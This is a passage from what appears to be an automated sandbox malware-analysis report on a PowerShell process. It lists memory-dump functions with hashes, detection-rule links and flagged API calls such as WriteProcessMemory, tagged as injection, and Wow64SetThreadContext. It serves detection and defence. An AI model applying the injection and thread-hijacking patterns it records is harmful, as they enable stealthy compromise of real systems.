API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 529a754eefc1b072e481119eff35a60c33a2a71d33a2d8cde4e4887e9dc1f91b
Instruction ID: 4c6b11326dbf71998b23473265242c0c5fd4faec57e0cb11015346ff732d6b3d
Opcode Fuzzy Hash: 529a754eefc1b072e481119eff35a60c33a2a71d33a2d8cde4e4887e9dc1f91b
Instruction Fuzzy Hash: C62112B59003499FCB10DFAAD985BDEBBF4FF48310F10842AE918A7250D374A984CFA0

Function 073F7B2A Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 073F7BAE

Memory Dump Source

Source File: 00000004.00000002.2946000066.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73f0000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d113cad3e00682c4dbb197237941b3ea2ec9c23b8105918deaaec47054115647
Instruction ID: a75474042014c5c300c43c22e58c0967ec4a90983cad7ab63aa495ef042e29ef
Opcode Fuzzy Hash: d113cad3e00682c4dbb197237941b3ea2ec9c23b8105918deaaec47054115647
Instruction Fuzzy Hash: 022137B1D002098FDB10DFAAC585BEEBFF4EF49324F148429D559A7240CB789985CFA0

Function 073F7B30 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 073F7BAE

Memory Dump Source

Source File: 00000004.00000002.2946000066.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_73f0000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 290bceb7f5b439a253066a8e9d313eaef3f8ac5224747a4213ca00f333a1adc4
Instruction ID: 30be21992862cf794c07fff360a7c68519fefacc147f65ef308c025effb4ad52
Opcode Fuzzy Hash: 290bceb7f5b439a253066a8e9d313eaef3f8ac5224747a4213ca00f333a1adc4
Instruction Fuzzy Hash: B82149B1D003098FDB10DFAAC5857EEBBF4EF48324F548429D559A7240CB789945CFA0

Function 07279210 Relevance: 1.6, APIs: 1, Instructions: 61injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0727929D

Memory Dump Source

Source File: 00000004.00000002.2945228653.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7270000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: c6037771a35756e5cebbdd5423d193701b8a39d4d73e5e92f698b202f877da01
Instruction ID: 0a8ac28ae3bca56d953a11a959877bb1e122979e1ef7e4234b07f2bf79a51382
Opcode Fuzzy Hash: c6037771a35756e5cebbdd5423d193701b8a39d4d73e5e92f698b202f877da01
Instruction Fuzzy Hash: AE21EFB59013499FCB10DF9AD985ADEBBF4FB48310F10842AE918A7250D378A940CBA0

Function 072792D9 Relevance: 1.5, APIs: 1, Instructions: 47injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0727929D

Memory Dump Source

Source File: 00000004.00000002.2945228653.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7270000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4b4d5f739685e414b1d2fdcda2c086bb14e3b9831286ac7c7ce9741d1e4a2607
Instruction ID: 06deb1b6c3df13aa09deb933711810f92ddf24c12d3a3e285227cc7a1cf14ebd
Opcode Fuzzy Hash: 4b4d5f739685e414b1d2fdcda2c086bb14e3b9831286ac7c7ce9741d1e4a2607
Instruction Fuzzy Hash: CB01C8B68143489FCB10EF98D988BCEBFF4FB49314F10844AE489A7251C338A884CB64

Function 07AF131D Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

4'jq, xrefs: 07AF13FB

Memory Dump Source

Source File: 00000004.00000002.2949177848.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7af0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq
API String ID: 0-3676250632
Opcode ID: 937d6c2417e1963c49c3ed902a66e7fa78b7bc15d336ad7985ac75100511a0fa
Instruction ID: a2c1e38dff5cae46d0b674cfa4301c9cb36d37878488b0888372f63a8e40abd8
Opcode Fuzzy Hash: 937d6c2417e1963c49c3ed902a66e7fa78b7bc15d336ad7985ac75100511a0fa
Instruction Fuzzy Hash: 6E21E5F9A0435EDFCB158FA9C4017B6FBB5ABC5212F084166FA2487642E335C545CBA1

Function 0898E6A0 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

p<jq, xrefs: 0898E6DA

Memory Dump Source

Source File: 00000004.00000002.2953289967.0000000008980000.00000040.00000800.00020000.00000000.sdmp, Offset: 08980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8980000_powershell.jbxd

Similarity

API ID:
String ID: p<jq
API String ID: 0-3743064563
Opcode ID: bfe15c0cd1667e8e4d418a3a2518538720cb4b8a4327052604db74d9fdc9e29d
Instruction ID: b0541698f7f976792b6dd4a61896ad3331da0a2061c7cb4f72daff5e2c26dd95
Opcode Fuzzy Hash: bfe15c0cd1667e8e4d418a3a2518538720cb4b8a4327052604db74d9fdc9e29d
Instruction Fuzzy Hash: 2C215070300159DFCB15EF2AC854AAE7BE9BF89319B154065FC45CB361DA35EC51CB60

Function 0898E692 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

p<jq, xrefs: 0898E6DA

Memory Dump Source

Source File: 00000004.00000002.2953289967.0000000008980000.00000040.00000800.00020000.00000000.sdmp, Offset: 08980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8980000_powershell.jbxd

Similarity

API ID:
String ID: p<jq
API String ID: 0-3743064563
Opcode ID: c5f410c4c47be7f68d45f37fc16b07efdf5e4eed7a65cb2749e5e152f596d619
Instruction ID: eb264f18c75776166f55061aeb3383fd13bd6efd9954e20639b866f02d805e32
Opcode Fuzzy Hash: c5f410c4c47be7f68d45f37fc16b07efdf5e4eed7a65cb2749e5e152f596d619
Instruction Fuzzy Hash: 59215E31304255DFCB05EF2AC854AAA7BFABF8A319B1544A5F845CB3B1DA35EC50CB60

Function 08986DFE Relevance: 1.3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

Strings

Tejq, xrefs: 08986E2D

Memory Dump Source

Source File: 00000004.00000002.2953289967.0000000008980000.00000040.00000800.00020000.00000000.sdmp, Offset: 08980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8980000_powershell.jbxd

Similarity

API ID:
String ID: Tejq
API String ID: 0-2468842661
Opcode ID: aa1196464d0039dbf0423257caeaf2cee0a3d0f706de821cc6cacef44831bba9
Instruction ID: bed5553888bac61f47cdaeee15789bca66a6c0ad1379517135b706693785461f
Opcode Fuzzy Hash: aa1196464d0039dbf0423257caeaf2cee0a3d0f706de821cc6cacef44831bba9
Instruction Fuzzy Hash: 0101C474D0025ACFDB10EF58E998B9DBBB2BB48305F1041A9E40AA7785D7345985CF41

Function 072B5248 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

V, xrefs: 072B5250

Memory Dump Source

Source File: 00000004.00000002.2945519784.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: V
API String ID: 0-1342839628
Opcode ID: d4f9b4447c8aa74cde39e897742257c73f63dc24f226282f6d3b46bf40037871
Instruction ID: 92b3ca4b60a6cd876273ce03b8ed7e5aeabb279795a6ebb248aa437e40a0a468
Opcode Fuzzy Hash: d4f9b4447c8aa74cde39e897742257c73f63dc24f226282f6d3b46bf40037871
Instruction Fuzzy Hash: 35E0ED7480A208ABCB11DBB4E8485A8BFB4AB02305F1480CEC8444B282CA326E12C741

Function 07AFD6A8 Relevance: .8, Instructions: 831COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2949177848.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7af0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 773bfb29ba5655347760b7d5c9908ff88f30a89fb8e493a49228be696f5bfed5
Instruction ID: b1952ff8a26f111cff75268b749350d22d1fabf7bf21a7690b7e7edbb8375059
Opcode Fuzzy Hash: 773bfb29ba5655347760b7d5c9908ff88f30a89fb8e493a49228be696f5bfed5
Instruction Fuzzy Hash: 0B728BB4B00215CFDB14DB98C990B69BBB2EF85304F54C199E919AB355CB32ED82CF91

Function 07AFD689 Relevance: .7, Instructions: 737COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2949177848.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7af0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 286809bb4625deb2d1fcf2f87b8d78dcc6557fe906b001f62cd6931b08a38426
Instruction ID: 89a669da4e52ac5e396587fc40c31a151b0ddc2aef0b294afd5bdd0c93f2043b
Opcode Fuzzy Hash: 286809bb4625deb2d1fcf2f87b8d78dcc6557fe906b001f62cd6931b08a38426
Instruction Fuzzy Hash: 6D627AB4B00215CFDB24DB58C990B69B7B2EF85304F54C199E919AB356CB32ED82CF91

Function 04FC8DD8 Relevance: .7, Instructions: 713COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2908153021.0000000004FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4fc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d9fff863c2b0c82b8ea6719cf9c1bf7f5758ff4900aa471f258673d48bf9810
Instruction ID: 9ecf6e79497b267546d503f2a1eb9e57e5328399a8f446562b70f5ff75b81d5b
Opcode Fuzzy Hash: 1d9fff863c2b0c82b8ea6719cf9c1bf7f5758ff4900aa471f258673d48bf9810
Instruction Fuzzy Hash: B3623874A002099FCB15DFA8D584A9EBBF6FF88310F248559E805AB365C771ED82CB90

Function 07AFE1DB Relevance: .6, Instructions: 574COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2949177848.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7af0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1db5b0a614be1ba29e5b5633f002813091c895207b1da955a197e5cdfe242b8
Instruction ID: fa6a72a9925992c8f77e04ed601b6aec97f03eeb1723d36b8b616af9929a36de
Opcode Fuzzy Hash: a1db5b0a614be1ba29e5b5633f002813091c895207b1da955a197e5cdfe242b8
Instruction Fuzzy Hash: 014279B4B00215CFDB14DB58C890F69B7B2AF85304F54C199EA19AB356CB32ED82CF91

Function 04FC88B0 Relevance: .4, Instructions: 368COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2908153021.0000000004FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4fc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d80d1d3a2104952e72250ca8216aeaf5947b340a3e373a51fa93c77da8e414f
Instruction ID: 51131d24e1ac6340332a02ebf469c26dc459df3f1f9cf03e0284387edb6ea974
Opcode Fuzzy Hash: 0d80d1d3a2104952e72250ca8216aeaf5947b340a3e373a51fa93c77da8e414f
Instruction Fuzzy Hash: 36C1A26250E7D65FC7039B3C98A45DABF71AF47254B1A41D7C4C0DF1A3D628AC0AC7A2

Function 0898B2E8 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2953289967.0000000008980000.00000040.00000800.00020000.00000000.sdmp, Offset: 08980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3be67d99ef3af7cd7422cb973108a941f76988e156f17028135425fceea7258c
Instruction ID: 60c7989d523eca1ea6e8e7915e372ea33d3e766d99da71f4932b272eb3970412
Opcode Fuzzy Hash: 3be67d99ef3af7cd7422cb973108a941f76988e156f17028135425fceea7258c
Instruction Fuzzy Hash: 9FA18A75B01209DFCB04EFA9E945AADBBF6EF88315F28446AE401AB390CB35DD45CB50

Function 072B9403 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2945519784.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3f80dcc22f015ab0634b5f47d14514a3d46b9fa34f02cedf3c3948e09093bb8
Instruction ID: 6f70ad49e3831b2d2b7e29a3b8f7c3246f142ea7d1caaf0b672aa3b3ee0a951b
Opcode Fuzzy Hash: a3f80dcc22f015ab0634b5f47d14514a3d46b9fa34f02cedf3c3948e09093bb8
Instruction Fuzzy Hash: 96C1C374E11218CFDB64DFA8E894B9DB7B2FB4A301F1080A9D61AA7294DB306DC5CF51

Function 072B9CE8 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2945519784.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d38d2856ec90ba28f001e8d0919eef8708a042035e646a8fcbe3a17d62e92db7
Instruction ID: 775223f3c615b578e1fe3aae1831f63fc83a5f195c05b7cd05069ae0040cdd43
Opcode Fuzzy Hash: d38d2856ec90ba28f001e8d0919eef8708a042035e646a8fcbe3a17d62e92db7
Instruction Fuzzy Hash: 39B1F2B0E25319CFDB60DF69E888BDDBBB2BB49301F1080A9D50DA7295CB706985CF51

Function 072B9CDA Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2945519784.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3421bb94e055124567becab3ba6ae9871e39ee2b7a8df2de4f12f25868fca78
Instruction ID: bca9fc1419cd26015f7c84d2854599d8838bb72b26ab8585516c7ea71291f267
Opcode Fuzzy Hash: e3421bb94e055124567becab3ba6ae9871e39ee2b7a8df2de4f12f25868fca78
Instruction Fuzzy Hash: DDB1F0B4E11319CFDB60DF69E888BDDBBB2AB49301F2080A9D50DA7395CB706985CF51

Function 04FC97A0 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2908153021.0000000004FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4fc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c08a63d8e041bf74b93beef2ce17f10ac1f0d231d160fec2103c7b3d56e44f4b
Instruction ID: 65eea202b358731f67aae0f7c7948b9d2027e21ed8cca885119ae28a10163f72
Opcode Fuzzy Hash: c08a63d8e041bf74b93beef2ce17f10ac1f0d231d160fec2103c7b3d56e44f4b
Instruction Fuzzy Hash: 5781D234A052558FCB15CF65C944DAEBBF2FF8A300F0880ADE945AB3A6D774E906CB50

Function 072B9FEF Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2945519784.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 566cf4c17e303e7ff33d9a054c8c979dfa692b9a596391bd684f899ef9e51a01
Instruction ID: a77807dd2de9ea656aa41360d53c8743239642053823765eb46200fd720fa3a4
Opcode Fuzzy Hash: 566cf4c17e303e7ff33d9a054c8c979dfa692b9a596391bd684f899ef9e51a01
Instruction Fuzzy Hash: B1A1CDB4E11319CFDB60DF68E988B9DBBB2BB49301F2080A9D51DA7395DB706985CF01

Function 072BA041 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2945519784.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e18aafe6245032cb1596cdb430134ba9e03c8cf11a684453afb119f8fd700d59
Instruction ID: 64c9160a6fa8c2e8929e00101f68c044d46d11c77df2894c309d668ed73aeed0
Opcode Fuzzy Hash: e18aafe6245032cb1596cdb430134ba9e03c8cf11a684453afb119f8fd700d59
Instruction Fuzzy Hash: 86A1DFB4E11319CFDB60DF68E888B9DBBB2BB49301F1081A9D50DAB395CB706985CF41

Function 072C202D Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2945618783.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 172bbd9681ea03c7f8e85d6793b9ac3dc77e03b3346081e61bae100795089e46
Instruction ID: d289bb4a94fae97f30b9d67a460edb67c1de67d591b3220daed213ed9873b7d9
Opcode Fuzzy Hash: 172bbd9681ea03c7f8e85d6793b9ac3dc77e03b3346081e61bae100795089e46
Instruction Fuzzy Hash: A1615BB0B10306DFE724CA58C850A6AF7F1FF69714B14C66ED9199B241CB72EC42CB51

Function 04FC9001 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2908153021.0000000004FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4fc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1cf4e38e4a2a2d1426d30a49c855242ce6934bc0be2cea9cb97d74becc2f3df
Instruction ID: 853fecc11f034dd51d2d898bcc9f4efa8402ab26656d09cc09a4619a0a4cc950
Opcode Fuzzy Hash: f1cf4e38e4a2a2d1426d30a49c855242ce6934bc0be2cea9cb97d74becc2f3df
Instruction Fuzzy Hash: 34515E70A00249EFDB05DF98D584A9EFBF6BF88310F288158E805AB365C735ED82CB50

Function 07AFA610 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2949177848.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7af0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ff5c690f45c1393a694b2760b9edbbe40fd63103847a60a8ab379c41ce01824
Instruction ID: d4ff73b5423069946f882245e938ac08875010fdbb65a373878846066ee308e8
Opcode Fuzzy Hash: 4ff5c690f45c1393a694b2760b9edbbe40fd63103847a60a8ab379c41ce01824
Instruction Fuzzy Hash: 4C4137B1B002158FCB109BB989005AEBBE5AFD5314F24C479D92ADB341DA31DE01CBA1

Function 04FC94D1 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2908153021.0000000004FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4fc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42fd5f52b114d026a8f2c72b849ad0274ad57b496c1f2084816bfcae69ca8805
Instruction ID: acd49da9044eaec91a7a20a54572f1e322146a12c38cf48c442325c0f8ad646e
Opcode Fuzzy Hash: 42fd5f52b114d026a8f2c72b849ad0274ad57b496c1f2084816bfcae69ca8805
Instruction Fuzzy Hash: 85510974A00209EFDB05CF98D584E9EBBB6FF88310F248559E805AB365C775ED86CB90

Function 04FC780F Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2908153021.0000000004FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4fc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caf1090a1421182b68054375d897d93d80ebbb6bff9ebf1928267f2566d820f5
Instruction ID: e6b2a6a35a1d6c22b5fe548ffa35023e1a842935c4d4b89998367acae1f101f1
Opcode Fuzzy Hash: caf1090a1421182b68054375d897d93d80ebbb6bff9ebf1928267f2566d820f5
Instruction Fuzzy Hash: 5541C8759097868FCB02CF6CD9908AABFB1FF4A310B1941DAD485DB262C735AC06CB61

Function 0740F758 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2946066291.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11f39c9093c321372023e1bcd3912e829741eceb00bd28bef21e4db74ec60878
Instruction ID: 5ad3d85796d938f5f1c98d1996f223c77569aa4c06335251f2fe395806243227
Opcode Fuzzy Hash: 11f39c9093c321372023e1bcd3912e829741eceb00bd28bef21e4db74ec60878
Instruction Fuzzy Hash: 9451B3B5D01209DFDB28DFB9D584ADDBBB2AF89300F20913AD406AB365DB359945CF40

Function 04BE8590 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2907999635.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4be0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9050b1b26ec549c691492202efaeafa1d9b92b83a81ec3de4d810b9a06b32fb3
Instruction ID: 92805c9df2acafb2d0faf339ce87ecb5ba0697e975354e7e338482d0dd7808bd
Opcode Fuzzy Hash: 9050b1b26ec549c691492202efaeafa1d9b92b83a81ec3de4d810b9a06b32fb3
Instruction Fuzzy Hash: DF41B0B0700104DFCF04EFA9C98496EBBE6EFD931476885A5D809AB350DB72ED018BA5

Function 0740F74B Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2946066291.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6316c50e64e191373b637f3a167169ee8f4599ed896bd01896f8b37be4419393
Instruction ID: 3ac0ec1e9035e4e285ee941714c1be95957cef8aaa16a57391161a3a82299f41
Opcode Fuzzy Hash: 6316c50e64e191373b637f3a167169ee8f4599ed896bd01896f8b37be4419393
Instruction Fuzzy Hash: A641B3B5D01208CFDB28DFB9D544ADDBBB2AF89304F20853ED41AAB265DB319945CF40

Function 089873F1 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2953289967.0000000008980000.00000040.00000800.00020000.00000000.sdmp, Offset: 08980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b664aa51207867d2973267916eb50f0db6e1995486b6b3de9e0cd1960309d133
Instruction ID: 6ff4f3a9d6f5cd89f815149e342a9669a55642d36acd0e38f6dd7a0b24c87fb8
Opcode Fuzzy Hash: b664aa51207867d2973267916eb50f0db6e1995486b6b3de9e0cd1960309d133
Instruction Fuzzy Hash: F4411574E05209DFCB04EFE9D484ADEBBB2FF89305F208069D519A7245D734A985CFA1

Function 072B943D Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2945519784.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 291bfcf79515336a0f430289d2d3951d2c29928001d726cf4c125c44bd036166
Instruction ID: 3c05fc4610874774cade57f53ede43524c3514ffc2485f5d76d1b2367d0c6a9d
Opcode Fuzzy Hash: 291bfcf79515336a0f430289d2d3951d2c29928001d726cf4c125c44bd036166
Instruction Fuzzy Hash: 804138B0D21258CFDB14CF98E498BEDB7B2FB86345F00406AD64AAB294D774A8C5CF50

Function 08987400 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2953289967.0000000008980000.00000040.00000800.00020000.00000000.sdmp, Offset: 08980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c812155d71ed93267383a4bce56bbfa4c818fcfbdf04080c7f87cee3eba81dfb
Instruction ID: b2df7f560394f5f748d1c29bb09336ff3f9df91bc30d96b93ccd21532b0a8414
Opcode Fuzzy Hash: c812155d71ed93267383a4bce56bbfa4c818fcfbdf04080c7f87cee3eba81dfb
Instruction Fuzzy Hash: 2641E2B4E05209DFDB04EFEAD444AEEBBF2EB88305F208069D519A7345D734A985CF91

Function 04FC88AD Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2908153021.0000000004FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4fc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1ec58035ea1124bddc383c38b6227efb0e01eff3501b68ee94fe0124b9086ac
Instruction ID: 1fa3562d2a10b88918d62444cd27f91ff082dce596a55d2989f384ae105fb73a
Opcode Fuzzy Hash: c1ec58035ea1124bddc383c38b6227efb0e01eff3501b68ee94fe0124b9086ac
Instruction Fuzzy Hash: E7315E74A0050A8FCB14CF9DC5809BEFBB6FF88311B248659D955A77A4D731EC91CB90

Function 04FC70EA Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2908153021.0000000004FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4fc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdcfa1fea11a3dbeef061a65c7057482f86cdd6d0fecf0c2831be22d4d3b2b3b
Instruction ID: 35da6b4dad5263965ef143db1160675660f315b967de6af9c3dcbe6b81a7c66c
Opcode Fuzzy Hash: cdcfa1fea11a3dbeef061a65c7057482f86cdd6d0fecf0c2831be22d4d3b2b3b
Instruction Fuzzy Hash: A4319A357006468FCB44DF69D9848AEBBFAFF8A20074445A9E442CBB75DB70ED49CB90

Function 04FC7862 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2908153021.0000000004FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4fc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6b26e03623e3f13eb37fa840245a2d337e7e7a8f33873b96b928a7130325087
Instruction ID: a309909ae21f7965e6cfacc77672112b5b75d5f44bca861f8f7f2ccc4fbbc2c2
Opcode Fuzzy Hash: c6b26e03623e3f13eb37fa840245a2d337e7e7a8f33873b96b928a7130325087
Instruction Fuzzy Hash: D3319E74A056868FCB01CF58C9809AAFFB1FF49310B29459AD858DB362C734AC45CF61

Function 072BF0D0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2945519784.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81d9b02b0a75c762ab26856bd30a854bb291dd0d947ddf08a7de14fb71d77a98
Instruction ID: 4e9f0f2ac1fc23110302cedcbd2824e42dfd0f2dcb7f1c5bb0d151b88f1bfb08
